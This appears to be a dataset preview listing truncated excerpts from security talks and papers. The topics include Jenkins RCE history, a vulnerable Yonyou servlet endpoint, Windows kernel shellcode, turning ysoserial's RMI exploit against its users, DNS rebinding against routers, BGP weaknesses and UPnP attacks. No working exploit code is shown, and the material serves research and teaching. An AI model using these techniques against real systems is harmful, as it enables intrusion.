“Self Mutating Code” (Lord Julius)
“The Art of Extreme Mutation” (Mental Drill)
Brief Description of Sections
1) Disassembler: used to disassemble host,
most often into a linked list of op codes.
2) Depermutater: removes s... | pdf |
Abusing Bleeding Edge Web
Standards for AppSec Glory
Bryant Zadegan
Ryan Lester
Advisor/Mentor
CEO, Co-Founder
Mach37
Cyph
keybase.io/bryant
hacker@linux.com
@eganist
@TheRyanLester
• Does AppSec stuff,
usually.
• Mentors security
startups, sometimes.
• “Mentors” others on
AppSec, occasionally.
• Pai... | pdf |
Jenkins 历史RCE漏洞梳理
环境下载,修改中间版本号从⽽下载任意版本
https://updates.jenkins-ci.org/download/war/2.31/jenkins.war,
https://get.jenkins.io/war/2.302/jenkins.war
Jenkins 中 java 版本的使⽤情况
1.612 以后是 java 7
2.54 之后是 java 8
2.164 之后是 java 8 或者 java 11
https://github.com/gquere/pwn_jenkins 相对⽐较全的 jenkins 总结
Jenkins 的三种模式
1. Full Access
在该全... | pdf |
PortBunny
A kernel-based port-scanner
Copyright © 2007 Recurity Labs GmbH
Copyright © 2007 Recurity Labs GmbH
Copyright © 2007 Recurity Labs GmbH
Copyright © 2007 Recurity Labs GmbH
A Port Scanner? *Yawn*
Port scanning is fun for most people
Needs random scanning
Needs 1337 output
Needs 23 different scanning types
... | pdf |
Hack the hackers:
Leaking data over
SSL/TLS
Ionut Cernica
Table of contents
Introduction
Scenarios and
Challanges
Blind Injection
Problem
Blind Injection
over SSL/TLS
01
03
02
04
Demo Time –
sqlmap
Conclusion
05
06
whoami
Security Researcher @Future Networks 5G Lab
PhD Student @Department of Computer Science
CTF P... | pdf |
漏洞点:/servlet/FileReceiveServlet
根据web.xml 向导,查看对应servlet的映射。
/service/* 和 /servlet/* 都对应nc.bs.framework.server.InvokerServlet 类
其类在/yonyou\home\lib\fwserver.jar 包内
其servlet的doGet和doPost方法都指向doAction方法
这里直接看doAction方法就可以了
这里主要是根据request.getPathInfo()的值获取了对应的moduleName和
serviceName
最终将值传递给了getServiceObject方法
其getServiceO... | pdf |
Windows_Kernel_Shellcode
_Exploit
chrO.ot
Nanika
Summary
• What is Exploit
• Windows_Shellcode
• Windows_Kernel_shellcode
• CreateRemoteThread backdoor “byshell”
• Exploit Demo
• 0day_exploit
What is Exploit
• Buffer overflow
• Heap overflow
• Format string
• CGI or SQL inject
Buffer overflow
STACK
----------------
Lo... | pdf |
闲来无事,反制ysoserial (
之前分析RMI的时候,发现对于客户端的反序列化攻击都是没有被修复的,也就是说如果调用了原生jdk
的rmi客户端相关调用,连接恶意JRMP服务端就会触发反序列化。
攻击客户端的场景不多,除了反打服务器,打真正客户端的场景可能就是反制了,或者叫蜜罐也行。那
么看下常见的攻击RMI的安全工具有没有这种问题。
ysoserial
上来看看Java安全神器ysoserial里和RMI有关的exp。yso里面大部分都是本地生成payload,但也有一
些打远程服务的,比如RMIRegistryExploit
public static void main(final String[] args... | pdf |
Forward-Looking Statement Disclaimer
This presentation may contain forward-looking statements under
applicable securities laws. All statements other than statements of
historical fact are forward-looking statements. Forward-looking
statements are based on information available to Jamf at the time they
are made and... | pdf |
2005 July 16
Copyright alan@chroot.org
1
Internet Threats in Depth
Phishing and Botnet
Alan
HIT 2005
2005 July 16
Copyright alan@chroot.org
2
Outline
Phishing (20 min)
Botnet (40 min)
2005 July 16
Copyright alan@chroot.org
3
What is Phishing?
Phishing attacks use both social
engineering and technical subterfuge to... | pdf |
!
"
#
$
%
&
'
(
%
)
*
+
,
-
*
-
.
/
0
/
1
2
.
.
2
/
-
3
4
2
5
/
6
-
7
/
/
2
3
8
1
/
-
2
4
3
2
4
/
9
0
5
-
:
;
<
=
>
?
@
A
B
C
D
E
F
G
H
I
J
K
L
MN
O
P
Q
Q
Q
R
S
T
T
U
V
W
H
I
X
Y
Z
W
[
\
K
I
Y
]
^
_
I
Y
F
W
H
L
E
`
L
K
_
a
F
_
b
a
L
L
E
F
H
E
c
_
N
L
d
a
F
_
b
a
L
L
E
I
Y
... | pdf |
Ticket to trouble
MifareClassic, The Dutch Transportation Card and Access Control
From the Netherlands
Self proclaimed geek
First program at age 5
Focus on security, privacy
Journalist, trainer/consultant
Following Mifare Classic from day one
Wanna know more? Beer makes me talk!
Everyone has the right to ... | pdf |
EtherSniff
EtherSniff
How to stealthily monitor an
How to stealthily monitor an
established Ethernet network
established Ethernet network
by Mark Smith, aka Smitty
Introduction
Introduction
Hardwired network paths are secure.
Hardwired network paths are secure.
No encryption needed internally.
No encryption needed ... | pdf |
1200 EIGHTEENTH STREET, NW
WASHINGTON, DC 20036
TEL 202.730.1300 FAX 202.730.1301
WWW.HARRISWILTSHIRE.COM
ATTORNEYS AT LAW
March 14, 2007
Via Electronic Filing
Ms. Marlene H. Dortch, Secretary
Federal Communications Commission
445 12th Street, SW
Washington, DC 20554
Re:
Notice of Ex Parte Communication,... | pdf |
Aaron Bayles
DC101 @ DEF CON 22
19 years in IT/Infosec
Worked in Oil & Gas (O&G) last 8 years
Along the way
Penetration testing
Vulnerability assessment
Network architecture, design &
implementation
Risk assessment
Legacy equipment/comms
Remote (geographic) connectivity
Availability, not confident... | pdf |
How I Hacked facebook
Again! by
Orange Tsai
Orange Tsai
• Principal security researcher at DEVCORE
• Captain of HITCON CTF team
• 0day researcher, focusing on
Web/Application security
orange_8361
Infiltrating Corporate Intranet
Like NSA
Pre-auth RCE on Leading SSL VPNs
Orange Tsai (@orange_8361)
Meh Chang (@mehqq_)
U... | pdf |
1
The Death of Cash
The Death of Cash
The Loss of Anonymity and
Other Dangers of Modern Financial Systems
Defcon 16
Las Vegas 2008
2
Agenda
Agenda
Introduction
Bold Claims
Why “THEY” Hate Cash
Utopian and Dystopian Versions of the Cash Free Society
CTRs and SARs
Other Regulations Regarding Cash
The Liquidity Dan... | pdf |
Alice and Bob are
Really Confused
David Huerta - DEF CON 23
Photo credit: Robert Young
such crypto parties
wow nyc
much codes
so cypherpunks
very google trolling
many credits: Atsuko Sato
Alice wants to talk to Bob,
but Eve is being nosey.
Alice hears about crypto,
goes to a crypto party to
learn how to crypto.
Sec... | pdf |
#BHUSA @BlackHatEvents
IAM Whoever I Say IAM
Infiltrating Identity Providers
Using 0Click Exploits
Steven Seeley of 360 Vulnerability Research Institute
#BHUSA @BlackHatEvents
Information Classification: General
> whoami
Focusing on Web, Application & Cloud 0-day Research:
•
Security Researcher for 360 Vulnerability R... | pdf |
Remote Attacks Against SOHO Routers
08 February, 2010
Craig Heffner
Abstract
This paper will describe how many consumer (SOHO) routers can be exploited via DNS re-binding to
gain interactive access to the router's internal-facing Web based administrative interface. Unlike other
DNS re-binding techniques, this att... | pdf |
360企业安全(360威胁情报中心)
BGP安全之殇
演讲人:张玉兵(Eric)
2 0 1 8
引言
BGPv4安全缺陷是全球互联网现存
最大最严重的安全漏洞
PART 01
关于BGP
目录
CONTENTS
PART 02
5个经典BGP安
全事件
PART 03
关于BGP的那些
安全缺陷/漏洞
PART 04
检测 and 防御
01
02
03
04
05
PART 05
BGP,AT&T and NSA
I’m the BGP protocol.At least so far,nothing is as
irreplaceable as me,
PART 01
关于BGP
BGP(RFC 1771、RFC 4271)... | pdf |
Let’s talk about SOAP, baby.
Let’s talk about UPnP.
Ricky “HeadlessZeke” Lawshae – DEFCON 23
Who am I?
• Security Researcher for HP TippingPoint’s DVLabs
team
• At Rapid7 before that, and BreakingPoint before that
• Speaker at Defcon, Recon, Insomni’hack, and
Ruxcon
• Voider of warranties
• Reader of comic books
• D... | pdf |
Franz Payer
Tactical Network Solutions
http://cyberexplo.it
Acknowledgements
q Zachary Cutlip
q Craig Heffner
q Tactical Network Solutions
Special Thanks
q Ronald Jenkees
§ Independent artist
§ http://www.ronaldjenkees.com
Legal
q EFF (www.eff.org)
q DMCA (Digital Millennium Copyright Act) ... | pdf |
原⽂链接,我做个复现.
https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/
<https://b4rtik.github.io/posts/antimalware-scan-interface-provider-for-persistence/>
https://twitter.com/netbiosX/status/1282051493676417028
<https://twitter.com/netbiosX/status/1282051493676417028>
出现错误的话.
试试
然后效果就是这样
... | pdf |
Unbootable
Exploiting the PayLock SmartBoot Vehicle
Immobilizer
what is a boot?
old school
PayLock SmartBoot
What Do I Do After My Car Gets Booted?
by NYC Department of Finance
well… how else can I remove it?
the wrong way
the wrong way
the wrong way
Reverse Engineering the PayLock SmartBoot
disassembly
[insert disass... | pdf |
主办方
赞助商
多元化新零售业务安全防护
—— 瑞数动态安全超融合解决方案
瑞数信息 吴剑刚
3
应用变化
API应用
APP应用
Web应用
微信/小程序
Web攻击防护
APP/API防护
微信/小程序防护
全应用融合防护
需求变化
随着数字化业务深化,导致应用安全防护需求不断升级
组合攻击
自动化攻击
人工渗透
手段变化
0day漏洞
已知漏洞
业务威胁
威胁变化
规则防护
安全联防
主动防御
理念变化
4
注:数据来源《瑞数信息Bots自动化威胁报告》
5
App/JSON
6%
App/XML
26%
Text/XML
14%
Text/HTML
54%
API访问流量占比46%
App/JSON
69%
Text/XML... | pdf |
DEFCON 16:
How to evade geospatial
intrusion detection techniques
Ryan W. Trost
Agenda
• GIS
• Geospatial Intrusion Detection
implementations
• Geospatial Intrusion Detection methodology
• Accuracy of IP -> lat/long translation
• Okay…so how do I beat it?
• Q&A
2
GIS
• GIS (Geographic Information Systems):
computer... | pdf |
1
Overview
What is Razorback?
3
Razorback Is…
● An Open Source framework (GPLv2) to enable
advanced processing of data and detection of
events
● Able to get data as it traverses the network
● Able to get data after it’s received by a server
● Able to perform advanced event correlation
● …Our answer to an ev... | pdf |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.